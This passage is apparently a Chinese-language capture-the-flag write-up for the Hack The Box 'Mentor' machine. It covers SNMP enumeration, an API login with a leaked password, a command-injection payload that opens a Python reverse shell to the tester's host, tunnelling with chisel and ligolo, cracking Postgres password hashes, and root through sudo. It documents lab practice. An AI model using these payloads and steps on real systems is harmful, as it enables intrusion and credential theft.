  2067                  runnable              python3               /usr/local/bin/python3  -c from multiprocessing.spawn import spawn_main; spawn_main(tracker_fd=5, pipe_handle=7) --multiprocessing-fork
  2089                  runnable              postgres              postgres: postgres mentorquotes_db 172.22.0.1(33730) idle                      
  2131                  runnable              login.py              /usr/bin/python3      /usr/local/bin/login.py kj23sadkj123as0-d213
  5535                  runnable              apache2               /usr/sbin/apache2     -k start            
  7368                  unknown               kworker/0:1-events                                              
  7389                  runnable              upowerd               /usr/libexec/upowerd                      
  8400                  unknown               kworker/1:1-events                                              
  8403                  unknown               kworker/0:0-cgroup_destroy                                            
  8436                  unknown               kworker/u256:3-flush-253:0                                            
  8487                  unknown               kworker/1:0-events                                              
  8538                  runnable              postgres              postgres: postgres mentorquotes_db 172.22.0.1(50524) idle                      
  20970                 unknown               kworker/u256:0-events_power_efficient                                            
  21067                 unknown               kworker/u256:2-flush-253:0                                            
  21088                 unknown               kworker/u256:1-flush-253:0                                            

[*] Storage information:

  Description                   : ["Physical memory"]
  Device id                     : [#<SNMP::Integer:0x0000ffff7bc68f10 @value=1>]
  Filesystem type               : ["unknown"]
  Device unit                   : [#<SNMP::Integer:0x0000ffff7bc9ce78 @value=1024>]
  Memory size                   : 3.80 GB
  Memory used                   : 1.34 GB

  Description                   : ["Virtual memory"]
  Device id                     : [#<SNMP::Integer:0x0000ffff7bcbec80 @value=3>]
  Filesystem type               : ["unknown"]
  Device unit                   : [#<SNMP::Integer:0x0000ffff7bd2ea58 @value=1024>]
  Memory size                   : 4.30 GB
  Memory used                   : 1.34 GB

  Description                   : ["Memory buffers"]
  Device id                     : [#<SNMP::Integer:0x0000ffff7bbe9148 @value=6>]
  Filesystem type               : ["unknown"]
  Device unit                   : [#<SNMP::Integer:0x0000ffff7bbeeeb8 @value=1024>]
  Memory size                   : 3.80 GB
  Memory used                   : 53.21 MB

  Description                   : ["Cached memory"]
  Device id                     : [#<SNMP::Integer:0x0000ffff7bc19eb0 @value=7>]
  Filesystem type               : ["unknown"]
  Device unit                   : [#<SNMP::Integer:0x0000ffff7bc1ffb8 @value=1024>]
  Memory size                   : 783.32 MB
  Memory used                   : 783.32 MB

  Description                   : ["Shared memory"]
  Device id                     : [#<SNMP::Integer:0x0000ffff7bc226f0 @value=8>]
  Filesystem type               : ["unknown"]
  Device unit                   : [#<SNMP::Integer:0x0000ffff7bc24bd0 @value=1024>]
  Memory size                   : 14.76 MB
  Memory used                   : 14.76 MB

  Description                   : ["Swap space"]
  Device id                     : [#<SNMP::Integer:0x0000ffff7bb9a980 @value=10>]
  Filesystem type               : ["unknown"]
  Device unit                   : [#<SNMP::Integer:0x0000ffff7bb98c48 @value=1024>]
  Memory size                   : 512.00 MB
  Memory used                   : 0 bytes

  Description                   : ["Available memory"]
  Device id                     : [#<SNMP::Integer:0x0000ffff7bbd9bf8 @value=11>]
  Filesystem type               : ["unknown"]
  Device unit                   : [#<SNMP::Integer:0x0000ffff7bbdfe68 @value=1024>]
  Memory size                   : 3.03 GB
  Memory used                   : 0 bytes

  Description                   : ["/run"]
  Device id                     : [#<SNMP::Integer:0x0000ffff7bbe2de8 @value=35>]
  Filesystem type               : ["unknown"]
  Device unit                   : [#<SNMP::Integer:0x0000ffff7bbe1100 @value=4096>]
  Memory size                   : 388.98 MB
  Memory used                   : 1.71 MB

  Description                   : ["/"]
  Device id                     : [#<SNMP::Integer:0x0000ffff7baebea8 @value=36>]
  Filesystem type               : ["unknown"]
  Device unit                   : [#<SNMP::Integer:0x0000ffff7baea170 @value=4096>]
  Memory size                   : 8.10 GB
  Memory used                   : 5.34 GB

  Description                   : ["/dev/shm"]
  Device id                     : [#<SNMP::Integer:0x0000ffff7baed0a0 @value=38>]
  Filesystem type               : ["unknown"]
  Device unit                   : [#<SNMP::Integer:0x0000ffff7bb3b3e0 @value=4096>]
  Memory size                   : 1.90 GB
  Memory used                   : 0 bytes

  Description                   : ["/run/lock"]
  Device id                     : [#<SNMP::Integer:0x0000ffff7bb3e270 @value=39>]
  Filesystem type               : ["unknown"]
  Device unit                   : [#<SNMP::Integer:0x0000ffff7bb3c628 @value=4096>]
  Memory size                   : 5.00 MB
  Memory used                   : 0 bytes

  Description                   : ["/boot"]
  Device id                     : [#<SNMP::Integer:0x0000ffff7bb6f500 @value=54>]
  Filesystem type               : ["unknown"]
  Device unit                   : [#<SNMP::Integer:0x0000ffff7bb6d868 @value=4096>]
  Memory size                   : 344.52 MB
  Memory used                   : 244.35 MB

  Description                   : ["/run/snapd/ns"]
  Device id                     : [#<SNMP::Integer:0x0000ffff7b8487a0 @value=55>]
  Filesystem type               : ["unknown"]
  Device unit                   : [#<SNMP::Integer:0x0000ffff7b84ead8 @value=4096>]
  Memory size                   : 388.98 MB
  Memory used                   : 1.71 MB


[*] File system information:

  Index                         : noSuchInstance
  Mount point                   : noSuchInstance
  Access                        : noSuchInstance
  Bootable                      : noSuchInstance

[*] Device information:

  Id                    Type                  Status                Descr               
  196608                unknown               running               AuthenticAMD: AMD EPYC 7313P 16-Core Processor
  196609                unknown               running               AuthenticAMD: AMD EPYC 7313P 16-Core Processor
  262145                unknown               running               network interface lo
  262146                unknown               running               network interface eth0
  262147                unknown               running               network interface br-7d5c72654da7
  262148                unknown               running               network interface br-a8a89c3bf6ff
  262149                unknown               running               network interface docker0
  262150                unknown               running               network interface br-028c7a43f929
  262151                unknown               running               network interface br-24ddaa1f3b47
  262152                unknown               running               network interface br-3d63c18e314d
  262154                unknown               running               network interface vethd75eef7
  262156                unknown               running               network interface veth7c0935f
  262158                unknown               running               network interface vethbd6a9fa
  786432                unknown               unknown               Guessing that there's a floating point co-processor

[*] Software components:

  Index                 Name                
  1                     adduser_3.118ubuntu5_all
  2                     amd64-microcode_3.20191218.1ubuntu2_amd64
  3                     apache2_2.4.52-1ubuntu4.2_amd64
.......
  714                   zlib1g-dev_1:1.2.11.dfsg-2ubuntu9.2_amd64
  715                   zstd_1.4.8+dfsg-3build1_amd64

13、发现一个进程的密码

2131                  runnable              login.py              /usr/bin/python3      /usr/local/bin/login.py kj23sadkj123as0-d213

14、结合这里发现的密码，和API网站的接口，多方测试发现可以正常登录，并获取到一个Authorization值

POST /auth/login HTTP/1.1
Host: api.mentorquotes.htb
User-Agent: Mozilla/5.0 (X11; Linux aarch64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 104

{
  "email": "james@mentorquotes.htb",
  "username": "james",
  "password": "kj23sadkj123as0-d213"
}


HTTP/1.1 200 OK
Date: Sun, 26 May 2024 08:06:33 GMT
Server: uvicorn
content-length: 154
content-type: application/json
Connection: close

"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6ImphbWVzIiwiZW1haWwiOiJqYW1lc0BtZW50b3JxdW90ZXMuaHRiIn0.peGpmshcF666bimHkYIBKQN7hj5m785uKcjwbD--Na0"

15、使用该值可以获取到当前系统内所有账号信息

GET /users/ HTTP/1.1
Host: api.mentorquotes.htb
User-Agent: Mozilla/5.0 (X11; Linux aarch64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Authorization: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6ImphbWVzIiwiZW1haWwiOiJqYW1lc0BtZW50b3JxdW90ZXMuaHRiIn0.peGpmshcF666bimHkYIBKQN7hj5m785uKcjwbD--Na0
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

HTTP/1.1 201 Created
Date: Sun, 26 May 2024 08:08:37 GMT
Server: uvicorn
content-length: 127
content-type: application/json
Connection: close

[{"id":1,"email":"james@mentorquotes.htb","username":"james"},{"id":2,"email":"svc@mentorquotes.htb","username":"service_acc"}]

16、由于通过进程，以及网页自身，可以知道这是一个python起的服务，同时某个接口存在命令执行漏洞，下面使用该漏洞进行获取初始反弹shell

POST /admin/backup HTTP/1.1
Host: api.mentorquotes.htb
User-Agent: Mozilla/5.0 (X11; Linux aarch64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Authorization: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6ImphbWVzIiwiZW1haWwiOiJqYW1lc0BtZW50b3JxdW90ZXMuaHRiIn0.peGpmshcF666bimHkYIBKQN7hj5m785uKcjwbD--Na0
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/json
Content-Length: 154

{"path":";python -c 'import os,pty,socket;s=socket.socket();s.connect((\"10.10.14.45\",443));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn(\"sh\")'"}

HTTP/1.1 200 OK
Date: Sun, 26 May 2024 08:13:08 GMT
Server: uvicorn
content-length: 16
content-type: application/json
Connection: close

{"INFO":"Done!"}

17、成功获取到初始权限

┌──(kali㉿offsec)-[~/Desktop]
└─$ rlwrap nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.45] from (UNKNOWN) [10.10.11.193] 38522
/app # 88R8R
8R8R
sh: 8R8R: not found
/app # ;;8R;8Rid
;8R;8Rid
sh: syntax error: unexpected ";"
/app # iid
id
sh: 8id: not found
/app # wwhoami
whoami
root
/app # ;8R;8R

18、这里的shell有些问题，我们去除掉前面的前置

┌──(kali㉿offsec)-[~/Desktop]
└─$ nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.45] from (UNKNOWN) [10.10.11.193] 43822
/app #        

/app # whoaim 
whoaim
sh: whoaim: not found
/app # whoami  
whoami
root
/app # 

19、升级一下完整的shell环境

/app # ^Z      
zsh: suspended  nc -lvnp 443
                                                                                        
┌──(kali㉿offsec)-[~/Desktop]
└─$ stty raw -echo; fg
[1]  + continued  nc -lvnp 443
                              reset


/app # id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
/app # 

20、这里就获取到初始的flag信息了

/app # ls la /home
ls: la: No such file or directory
/home:
svc
/app # cd /home/svc
/home/svc # ls -la
total 28
drwxr-x---    4 1001     1001          4096 Nov 11  2022 .
drwxr-xr-x    1 root     root          4096 Nov 10  2022 ..
lrwxrwxrwx    1 root     root             9 Nov 10  2022 .bash_history -> /dev/null
-rw-r--r--    1 1001     1001          3771 Jun  7  2022 .bashrc
drwx------    3 1001     1001          4096 Jun 12  2022 .cache
drwxrwxr-x    5 1001     1001          4096 Jun 12  2022 .local
-rw-r--r--    1 1001     1001           807 Jun  7  2022 .profile
-rw-r-----    1 root     1001            33 May 26 03:26 user.txt
/home/svc # cat user.txt
517fdda016586a10cfc706f184adc76a
/home/svc # 

0x02 系统权限获取

21、初步判断，这里应该是个容器环境

/home/svc # cat /proc/1/environ
PATH=/home/svc/.local/bin:/usr/local/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/binHOSTNAME=58de9fcf2b6aADMIN_USER=jamesADMIN_EMAIL=james@mentorquotes.htbSECRET=76dsf761g31276hjgsdkahuyt123WORK_DIR=/app/LANG=C.UTF-8GPG_KEY=0D96DF4D4110E5C43FBFB17F2D347EA6AA65421DPYTHON_VERSION=3.6.9PYTHON_PIP_VERSION=19.3.1PYTHON_GET_PIP_URL=https://github.com/pypa/get-pip/raw/ffe826207a010164265d9cc807978e3604d18ca0/get-pip.pyPYTHON_GET_PIP_SHA256=b86f36cc4345ae87bfd4f10ef6b2dbfa7a872fbff70608a1e43944d283fd0eeeHOME=/home/svc/home/svc # 
/home/svc # find / -maxdepth 3 -name '*dockerenv*' -exec ls -la {} \; 2>/dev/nul
l
-rwxr-xr-x    1 root     root             0 May 26 03:26 /.dockerenv
/home/svc # 

22、应该是docker容器了

/home/svc # ifconfig
eth0      Link encap:Ethernet  HWaddr 02:42:AC:16:00:03  
          inet addr:172.22.0.3  Bcast:172.22.255.255  Mask:255.255.0.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:676130 errors:0 dropped:0 overruns:0 frame:0
          TX packets:455639 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:100589012 (95.9 MiB)  TX bytes:64601178 (61.6 MiB)

lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)

/home/svc # 

23、因为，IP地址也不对，开始排查容器内部信息

/home/svc # cd /app
/app # ls -la
total 24
drwxr-xr-x    1 root     root          4096 Nov 10  2022 .
drwxr-xr-x    1 root     root          4096 May 26 03:26 ..
-rw-r--r--    1 root     root          1024 Jun 12  2022 .Dockerfile.swp
-rw-r--r--    1 root     root           522 Nov  3  2022 Dockerfile
drwxr-xr-x    1 root     root          4096 Nov 10  2022 app
-rw-r--r--    1 root     root           672 Jun  4  2022 requirements.txt
/app # cat Dockerfile
FROM python:3.6.9-alpine

RUN apk --update --upgrade add --no-cache  gcc musl-dev jpeg-dev zlib-dev libffi-dev cairo-dev pango-dev gdk-pixbuf-dev

WORKDIR /app
ENV HOME /home/svc
ENV PATH /home/svc/.local/bin:${PATH}
RUN python -m pip install --upgrade pip --user svc
COPY requirements.txt requirements.txt
RUN pip install -r requirements.txt
RUN pip install pydantic[email] pyjwt
EXPOSE 8000
COPY . .
CMD ["python3", "-m", "uvicorn", "app.main:app", "--reload", "--workers", "100", "--host", "0.0.0.0", "--port" ,"8000"]
/app # 


/app # ls -la app/
total 28
drwxr-xr-x    1 root     root          4096 Nov 10  2022 .
drwxr-xr-x    1 root     root          4096 Nov 10  2022 ..
-rw-r--r--    1 root     root             0 Jun  4  2022 __init__.py
drwxr-xr-x    1 root     root          4096 Nov 10  2022 __pycache__
drwxr-xr-x    1 root     root          4096 Nov 10  2022 api
-rw-r--r--    1 root     root             0 Jun  4  2022 config.py
-rw-r--r--    1 root     root          1001 Jun  7  2022 db.py
-rw-r--r--    1 root     root          1149 Jun  4  2022 main.py
-rw-r--r--    1 root     root           704 Jun  4  2022 requirements.txt
/app # 


/app # cat app/config.py
/app # cat app/db.py
import os

from sqlalchemy import (Column, DateTime, Integer, String, Table, create_engine, MetaData)
from sqlalchemy.sql import func
from databases import Database

# Database url if none is passed the default one is used
DATABASE_URL = os.getenv("DATABASE_URL", "postgresql://postgres:postgres@172.22.0.1/mentorquotes_db")

# SQLAlchemy for quotes
engine = create_engine(DATABASE_URL)
metadata = MetaData()
quotes = Table(
    "quotes",
    metadata,
    Column("id", Integer, primary_key=True),
    Column("title", String(50)),
    Column("description", String(50)),
    Column("created_date", DateTime, default=func.now(), nullable=False)
)

# SQLAlchemy for users
engine = create_engine(DATABASE_URL)
metadata = MetaData()
users = Table(
    "users",
    metadata,
    Column("id", Integer, primary_key=True),
    Column("email", String(50)),
    Column("username", String(50)),
    Column("password", String(128) ,nullable=False)
)


# Databases query builder
database = Database(DATABASE_URL)

/app # 

24、这里是连接数据库，需要把端口给转发出来，这里传一个chisel工具，进行端口转发，这里执行的是反向代理方法

/app # cd /tmp
/tmp # ls -la
total 8
drwxrwxrwt    1 root     root          4096 May 26 03:26 .
drwxr-xr-x    1 root     root          4096 May 26 03:26 ..
/tmp # wget 10.10.14.45/chisel_1.9.1_linux_amd64
Connecting to 10.10.14.45 (10.10.14.45:80)
chisel_1.9.1_linux_a 100% |********************************| 8452k  0:00:00 ETA
/tmp # ./chisel_1.9.1_linux_amd64  client 10.10.14.45:12345 R:5432:172.22.0.1:54
32
sh: ./chisel_1.9.1_linux_amd64: Permission denied
/tmp # chmod +x ./chisel_1.9.1_linux_amd64
/tmp # ./chisel_1.9.1_linux_amd64  client 10.10.14.45:12345 R:5432:172.22.0.1:54
32
2024/05/26 08:37:20 client: Connecting to ws://10.10.14.45:12345
2024/05/26 08:37:21 client: Connected (Latency 137.256932ms)

┌──(kali㉿offsec)-[~/Desktop/tools/chisel]
└─$ ./chisel_1.9.1_linux_arm64 server -p 12345 --reverse
2024/05/26 16:36:38 server: Reverse tunnelling enabled
2024/05/26 16:36:38 server: Fingerprint EqPvfVEYt88pTbPCpS8eGptqwlV2oyH/7GcH3FYNXMQ=
2024/05/26 16:36:38 server: Listening on http://0.0.0.0:12345
2024/05/26 16:43:02 server: session#1: tun: proxy#R:5432=>172.22.0.1:5432: Listening

25、搭建好端口转发后，就开始本地去连接一下这个数据库去查看

┌──(kali㉿offsec)-[~/Desktop]
└─$ psql -h 127.0.0.1 -p 5432 -U postgres
用户 postgres 的口令：
psql (16.1 (Debian 16.1-1), 服务器 13.7 (Debian 13.7-1.pgdg110+1))
输入 "help" 来获取帮助信息.

postgres=# SELECT * FROM mentorquotes_db;
ERROR:  relation "mentorquotes_db" does not exist
第1行SELECT * FROM mentorquotes_db;
                   ^
postgres=# \l
                                                             数据库列表
      名称       |  拥有者  | 字元编码 | Locale Provider |  校对规则  |   Ctype    | ICU Locale | ICU Rules |       存取权限        
-----------------+----------+----------+-----------------+------------+------------+------------+-----------+-----------------------
 mentorquotes_db | postgres | UTF8     | libc            | en_US.utf8 | en_US.utf8 |            |           | 
 postgres        | postgres | UTF8     | libc            | en_US.utf8 | en_US.utf8 |            |           | 
 template0       | postgres | UTF8     | libc            | en_US.utf8 | en_US.utf8 |            |           | =c/postgres          +
                 |          |          |                 |            |            |            |           | postgres=CTc/postgres
 template1       | postgres | UTF8     | libc            | en_US.utf8 | en_US.utf8 |            |           | =c/postgres          +
                 |          |          |                 |            |            |            |           | postgres=CTc/postgres
(4 行记录)

postgres=# \c mentorquotes_db
psql (16.1 (Debian 16.1-1), 服务器 13.7 (Debian 13.7-1.pgdg110+1))
您现在已经连接到数据库 "mentorquotes_db",用户 "postgres".
mentorquotes_db=# \dt
                关联列表
 架构模式 |   名称   |  类型  |  拥有者  
----------+----------+--------+----------
 public   | cmd_exec | 数据表 | postgres
 public   | quotes   | 数据表 | postgres
 public   | users    | 数据表 | postgres
(3 行记录)

mentorquotes_db=# select * from users
mentorquotes_db-# ;
 id |         email          |  username   |             password             
----+------------------------+-------------+----------------------------------
  1 | james@mentorquotes.htb | james       | 7ccdcd8c05b59add9c198d492b36a503
  2 | svc@mentorquotes.htb   | service_acc | 53f22d0dfa10dce7e29cd31f4f953fd8
(2 行记录)

mentorquotes_db=# 

26、对发现的密码进行破解

https://crackstation.net/

123meunomeeivani

27、尝试登录，发现这个时候登录的就是宿主机了

┌──(kali㉿offsec)-[~/Desktop]
└─$ sshpass -p '123meunomeeivani' ssh svc@10.10.11.193
Welcome to Ubuntu 22.04.1 LTS (GNU/Linux 5.15.0-56-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Sun May 26 08:47:32 AM UTC 2024

  System load:                      0.0
  Usage of /:                       66.1% of 8.09GB
  Memory usage:                     16%
  Swap usage:                       0%
  Processes:                        250
  Users logged in:                  0
  IPv4 address for br-028c7a43f929: 172.20.0.1
  IPv4 address for br-24ddaa1f3b47: 172.19.0.1
  IPv4 address for br-3d63c18e314d: 172.21.0.1
  IPv4 address for br-7d5c72654da7: 172.22.0.1
  IPv4 address for br-a8a89c3bf6ff: 172.18.0.1
  IPv4 address for docker0:         172.17.0.1
  IPv4 address for eth0:            10.10.11.193
  IPv6 address for eth0:            dead:beef::250:56ff:feb9:495a

  => There are 5 zombie processes.


0 updates can be applied immediately.


The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Last login: Mon Dec 12 10:22:58 2022 from 10.10.14.40
svc@mentor:~$ id
uid=1001(svc) gid=1001(svc) groups=1001(svc)
svc@mentor:~$ 

28、进行枚举查找提权的方法

svc@mentor:~$ sudo -l
[sudo] password for svc: 
Sorry, user svc may not run sudo on mentor.
svc@mentor:~$ ls -la
total 28
drwxr-x--- 4 svc  svc  4096 Nov 11  2022 .
drwxr-xr-x 4 root root 4096 Jun 10  2022 ..
lrwxrwxrwx 1 root root    9 Nov 10  2022 .bash_history -> /dev/null
-rw-r--r-- 1 svc  svc  3771 Jun  7  2022 .bashrc
drwx------ 3 svc  svc  4096 Jun 12  2022 .cache
drwxrwxr-x 5 svc  svc  4096 Jun 12  2022 .local
-rw-r--r-- 1 svc  svc   807 Jun  7  2022 .profile
-rw-r----- 1 root svc    33 May 26 03:26 user.txt
svc@mentor:~$ 

svc@mentor:/tmp$ wget 10.10.14.45/linpeas.sh
--2024-05-26 08:54:13--  http://10.10.14.45/linpeas.sh
Connecting to 10.10.14.45:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 847920 (828K) [text/x-sh]
Saving to: ‘linpeas.sh’

linpeas.sh                                    100%[=================================================================================================>] 828.05K  25.1KB/s    in 29s     

2024-05-26 08:54:42 (29.0 KB/s) - ‘linpeas.sh’ saved [847920/847920]

svc@mentor:/tmp$ chmod +x ./linpeas.sh 
svc@mentor:/tmp$ ./linpeas.sh


╔══════════╣ Analyzing SNMP Files (limit 70)
-rw-r--r-- 1 root root 3453 Jun  5  2022 /etc/snmp/snmpd.conf                                                                                                                           
# rocommunity: a SNMPv1/SNMPv2c read-only access community name
rocommunity  public default -V systemonly
rocommunity6 public default -V systemonly
createUser bootstrap MD5 SuperSecurePassword123__ DES
-rw------- 1 Debian-snmp Debian-snmp 1268 May 26 03:26 /var/lib/snmp/snmpd.conf

29、在查看盒子上的各种配置时，我会查看 中的 SNMPd /etc/snmp/snmpd.conf。它有很多注释行，我会用 删除它们grep -v “^#”，还有一堆空行，我会用 删除它们grep .：

svc@mentor:~$ cd /etc/snmp
svc@mentor:/etc/snmp$ ls -la
total 20
drwxr-xr-x   3 root root 4096 Nov 10  2022 .
drwxr-xr-x 108 root root 4096 Dec  5  2022 ..
-rw-r--r--   1 root root  511 Jun  5  2022 snmp.conf
-rw-r--r--   1 root root 3453 Jun  5  2022 snmpd.conf
drwxr-xr-x   2 root root 4096 Apr 21  2022 snmpd.conf.d
svc@mentor:/etc/snmp$ cat snmpd.conf | grep -v "^#" | grep .
sysLocation    Sitting on the Dock of the Bay
sysContact     Me <admin@mentorquotes.htb>
sysServices    72
master  agentx
agentAddress udp:161,udp6:[::1]:161
view   systemonly  included   .1.3.6.1.2.1.1
view   systemonly  included   .1.3.6.1.2.1.25.1
rocommunity  public default -V systemonly
rocommunity6 public default -V systemonly
rouser authPrivUser authpriv -V systemonly
includeDir /etc/snmp/snmpd.conf.d
createUser bootstrap MD5 SuperSecurePassword123__ DES
rouser bootstrap priv
com2sec AllUser default internal
group AllGroup v2c AllUser
view SystemView included .1.3.6.1.2.1.25.1.1
view AllView included .1
access AllGroup "" any noauth exact AllView none none
svc@mentor:/etc/snmp$ 

30、这里发现了一个密码信息，尝试进行账号切换登录

svc@mentor:~$ su - james
Password: 
james@mentor:~$ id
uid=1000(james) gid=1000(james) groups=1000(james)
james@mentor:~$ sudo -l
[sudo] password for james: 
Matching Defaults entries for james on mentor:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User james may run the following commands on mentor:
    (ALL) /bin/sh
james@mentor:~$

31、该账号拥有sudo权限，可以直接提权

james@mentor:~$ sh -p
$ id
uid=1000(james) gid=1000(james) groups=1000(james)
$ exit
james@mentor:~$ sudo sh -p
# id
uid=0(root) gid=0(root) groups=0(root)
# cat /root/root.txt
fb595e84e28f00e0d1e6953d269cc26d
# 

32、下面补充一个ligolo进行端口转发的示例

┌──(kali㉿offsec)-[~/Desktop/tools/ligolo/ligolo-ng_proxy_0.5.1_linux_arm64]
└─$ sudo ip tuntap add user kali mode tun ligolo 
[sudo] kali 的密码：

┌──(kali㉿offsec)-[~/Desktop/tools/ligolo/ligolo-ng_proxy_0.5.1_linux_arm64]
└─$ sudo ip link set ligolo up

┌──(kali㉿offsec)-[~/Desktop/tools/ligolo/ligolo-ng_proxy_0.5.1_linux_arm64]
└─$ ./proxy -selfcert
WARN[0000] Using automatically generated self-signed certificates (Not recommended) 
INFO[0000] Listening on 0.0.0.0:11601                   
    __    _             __                       
   / /   (_)___ _____  / /___        ____  ____ _
  / /   / / __ `/ __ \/ / __ \______/ __ \/ __ `/
 / /___/ / /_/ / /_/ / / /_/ /_____/ / / / /_/ / 
/_____/_/\__, /\____/_/\____/     /_/ /_/\__, /  
        /____/                          /____/   

  Made in France ♥            by @Nicocha30!

ligolo-ng » INFO[0475] Agent joined.                                 name=root@58de9fcf2b6a remote="10.10.11.193:34570"
ligolo-ng » 
ligolo-ng » session
? Specify a session : 1 - #1 - root@58de9fcf2b6a - 10.10.11.193:34570
[Agent : root@58de9fcf2b6a] » start
[Agent : root@58de9fcf2b6a] » INFO[0516] Starting tunnel to root@58de9fcf2b6a         
[Agent : root@58de9fcf2b6a] » 
[Agent : root@58de9fcf2b6a] » ifconfig
┌─────────────────────────────────────┐
│ Interface 0                         │
├──────────────┬─────────────────────┤
│ Name         │ lo                  │
│ Hardware MAC │                     │
│ MTU          │ 65536               │
│ Flags        │ up|loopback|running │
│ IPv4 Address │ 127.0.0.1/8         │
└──────────────┴─────────────────────┘
┌────────────────────────────────────────────────┐
│ Interface 1                                    │
├──────────────┬────────────────────────────────┤
│ Name         │ eth0                           │
│ Hardware MAC │ 02:42:ac:16:00:03              │
│ MTU          │ 1500                           │
│ Flags        │ up|broadcast|multicast|running │
│ IPv4 Address │ 172.22.0.3/16                  │
└──────────────┴────────────────────────────────┘
[Agent : root@58de9fcf2b6a] » 
[Agent : root@58de9fcf2b6a] » stop
[Agent : root@58de9fcf2b6a] » INFO[0834] Closing tunnel to root@58de9fcf2b6a...       
[Agent : root@58de9fcf2b6a] » 
[Agent : root@58de9fcf2b6a] » start
[Agent : root@58de9fcf2b6a] » INFO[0954] Starting tunnel to root@58de9fcf2b6a         
[Agent : root@58de9fcf2b6a] » 
[Agent : root@58de9fcf2b6a] »  



/tmp # wget 10.10.14.45/agent
Connecting to 10.10.14.45 (10.10.14.45:80)
agent                100% |********************************| 4572k  0:00:00 ETA
/tmp # chmod + /agent
chmod: /agent: No such file or directory
/tmp # chmod + ./agent
/tmp # .\agent -connect 10.10.14.45:11601 -ignore-cert
sh: .agent: not found
/tmp # ls -la
total 13036
drwxrwxrwt    1 root     root          4096 May 26 08:59 .
drwxr-xr-x    1 root     root          4096 May 26 03:26 ..
-rw-r--r--    1 root     root       4681728 May 26 09:02 agent
-rwxr-xr-x    1 root     root       8654848 May 26 08:35 chisel_1.9.1_linux_amd64
/tmp # ./agent -connect 10.10.14.45:11601 -ignore-cert
sh: ./agent: Permission denied
/tmp # chmod +x ./agent 
/tmp # ls -la
total 13036
drwxrwxrwt    1 root     root          4096 May 26 08:59 .
drwxr-xr-x    1 root     root          4096 May 26 03:26 ..
-rwxr-xr-x    1 root     root       4681728 May 26 09:02 agent
-rwxr-xr-x    1 root     root       8654848 May 26 08:35 chisel_1.9.1_linux_amd64
/tmp # ./agent -connect 10.10.14.45:11601 -ignore-cert
WARN[0000] warning, certificate validation disabled     
INFO[0000] Connection established                        addr="10.10.14.45:11601"



┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo ip route add 172.22.0.1/32 dev ligolo
             
┌──(kali㉿offsec)-[~/Desktop]
└─$ psql -h 172.22.0.1 -p 5432 -U postgres   
用户 postgres 的口令：
psql (16.1 (Debian 16.1-1), 服务器 13.7 (Debian 13.7-1.pgdg110+1))
输入 "help" 来获取帮助信息.

postgres=# \l
                                                             数据库列表
      名称       |  拥有者  | 字元编码 | Locale Provider |  校对规则  |   Ctype    | ICU Locale | ICU Rules |       存取权限        
-----------------+----------+----------+-----------------+------------+------------+------------+-----------+-----------------------
 mentorquotes_db | postgres | UTF8     | libc            | en_US.utf8 | en_US.utf8 |            |           | 
 postgres        | postgres | UTF8     | libc            | en_US.utf8 | en_US.utf8 |            |           | 
 template0       | postgres | UTF8     | libc            | en_US.utf8 | en_US.utf8 |            |           | =c/postgres          +
                 |          |          |                 |            |            |            |           | postgres=CTc/postgres
 template1       | postgres | UTF8     | libc            | en_US.utf8 | en_US.utf8 |            |           | =c/postgres          +
                 |          |          |                 |            |            |            |           | postgres=CTc/postgres
(4 行记录)

postgres=# 



最后删除下这个路由就OK了

0x03 通关凭证展示

https://www.hackthebox.com/achievement/machine/1705469/518